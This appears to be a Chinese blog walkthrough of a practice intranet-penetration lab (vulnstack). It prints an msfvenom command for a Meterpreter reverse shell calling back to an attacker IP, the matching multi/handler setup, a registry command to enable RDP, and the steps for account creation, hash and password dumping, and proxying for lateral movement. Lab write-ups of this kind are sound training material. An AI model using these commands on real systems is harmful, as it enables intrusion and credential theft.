內網滲透靶機演練


靶場: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

參考: https://www.anquanke.com/post/id/189940

第一次做關於內網滲透的靶場所以記錄一下,靶場還沒完成(太菜了)。。。。。。

入侵服務器

http://192.168.226.31/yxcms/index.php?r=admin

image.png

image.png

image.png

查看當前權限

image.png

查看3389端口是否開啟

image.png

開啟3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

image.png

image.png

添加一個用戶

image.png

image.png

遠程登錄

image.png

內網信息收集

net view /domain 查詢域列表

image.png

查詢同域的機器

image.png

判斷主域

image.png

獲取域控的IP地址

域中其他主機IP地址

image.png

image.png

查詢域用戶

image.png

制作反彈shell

這里請制作32的shell,64為連接不穩定

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.226.30 lport=4444 -f exe -o shell.exe

image.png

蟻劍文件上傳

image.png

進入msf命令行

image.png

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.226.30
lhost => 192.168.226.30
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit

image.png

獲取system權限

image.png

獲取hash

image.png

獲取明文密碼

image.png

image.png

添加路由表來跨域攻擊

即所有對74網段的攻擊流量都通過已滲透的這台目標主機的meterpreter會話來傳遞

image.png

設置代理

image.png

看主機3389端口是否開啟

image.png

給域成員添加用戶

image.png

使用ew制作內網代理

image.png

使用代理后的msf攻擊域成員

image.png

還有很多地方需要深入了解,努力學習!!!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM